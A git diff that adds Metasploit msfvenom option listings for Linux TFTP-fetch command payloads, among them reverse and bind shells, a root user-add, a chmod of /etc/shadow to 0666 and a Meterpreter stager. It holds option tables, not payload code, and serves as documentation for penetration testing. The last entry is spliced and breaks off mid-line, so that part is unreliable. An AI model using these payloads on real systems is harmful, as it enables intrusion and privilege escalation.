a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_find_port.txt new file mode 100644 index 0000000..b60f2b4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_find_port.txt @@ -0,0 +1,73 @@ + + Name: TFTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/tftp/x64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 91 + Rank: Normal + +Provided by: + Brendan Watters + mak + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 15617 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TzaCUbPtlaEF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_ipv6_tcp.txt new file mode 100644 index 0000000..e4b78af --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_ipv6_tcp.txt @@ -0,0 +1,82 @@ + + Name: TFTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/tftp/x64/shell_reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME iBwfwDdwil no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_tcp.txt new file mode 100644 index 0000000..68c85d7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_reverse_tcp.txt @@ -0,0 +1,81 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/x64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME tjIaDLTNLaKM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-adduser.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-adduser.txt new file mode 100644 index 0000000..db50d26 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-adduser.txt @@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux Add User + Module: payload/cmd/linux/tftp/x86/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + vlad902 + spoonm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME RPWXdYqfI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-chmod.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-chmod.txt new file mode 100644 index 0000000..d684d9c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-chmod.txt @@ -0,0 +1,76 @@ + + Name: TFTP Fetch, Linux Chmod + Module: payload/cmd/linux/tftp/x86/chmod + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FILE /etc/shadow yes Filename to chmod +MODE 0666 yes File mode (octal) + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uXVuDvjo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Runs chmod on specified file with specified mode + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-exec.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-exec.txt new file mode 100644 index 0000000..ca50990 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-exec.txt @@ -0,0 +1,77 @@ + + Name: TFTP Fetch, Linux Execute Command + Module: payload/cmd/linux/tftp/x86/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + vlad902 + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pxxoExvZUZ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-generic-debug_trap.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-generic-debug_trap.txt new file mode 100644 index 0000000..8dced88 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-generic-debug_trap.txt @@ -0,0 +1,65 @@ + + Name: TFTP Fetch, Generic x86 Debug Trap + Module: payload/cmd/linux/tftp/x86/generic/debug_trap + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + robert + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME akbKBqVoJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Generate a debug trap in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-generic-tight_loop.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-generic-tight_loop.txt new file mode 100644 index 0000000..a321651 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-generic-tight_loop.txt @@ -0,0 +1,65 @@ + + Name: TFTP Fetch, Generic x86 Tight Loop + Module: payload/cmd/linux/tftp/x86/generic/tight_loop + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + jduck + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME iKsjlklFcfxn no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Generate a tight loop in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp.txt new file mode 100644 index 0000000..76dfa54 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp.txt @@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp: +========================= + +iam_webb@rapid7.com> + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME rrljDzjxie no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 